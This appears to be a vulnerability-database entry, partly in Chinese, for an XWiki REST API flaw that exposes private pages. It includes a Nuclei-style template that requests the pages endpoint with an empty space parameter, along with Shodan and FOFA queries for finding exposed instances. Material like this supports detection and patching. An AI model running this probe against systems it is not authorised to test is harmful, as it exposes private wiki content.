CVE-2025-29925: XWiki REST API - Private Pages Disclosure

日期: 2025-08-01 | 影响软件: XWiki | POC: 已公开

漏洞描述

A vulnerability in XWiki's REST API allows unauthenticated users to access information about private pages through the pages endpoint. This could lead to disclosure of sensitive information and page metadata.

PoC代码[已公开]

id: CVE-2025-29925

info:
  name: XWiki REST API - Private Pages Disclosure
  author: ritikchaddha
  severity: high
  description: |
    A vulnerability in XWiki's REST API allows unauthenticated users to access information about private pages through the pages endpoint. This could lead to disclosure of sensitive information and page metadata.
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-285
    cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    verified: true
    vendor: xwiki
    product: xwiki
    shodan-query: html:"data-xwiki-reference"
    fofa-query: body="data-xwiki-reference"
  tags: cve,cve2025,xwiki,rest-api,exposure,vkev,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/{{path}}"

    payloads:
      path:
        - "rest/wikis/xwiki/pages?space="
        - "xwiki/rest/wikis/xwiki/pages?space="

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<pageSummary"
          - "<pages"
          - "<xwikiRelativeUr"
        condition: and

      - type: word
        part: header
        words:
          - "text/xml"
          - "text/javascript"

      - type: status
        status:
          - 200
# digest: 4b0a0048304602210086c3e24d79966b2d759f1767d26b52abe1f66726c2d666530ace35c466bdac220221008d4aa6d8d441802b4ef139defc27ce49536d0e99c70f88c1a58387cab042000f:922c64590222798bb761d5b6d8e72950

相关漏洞推荐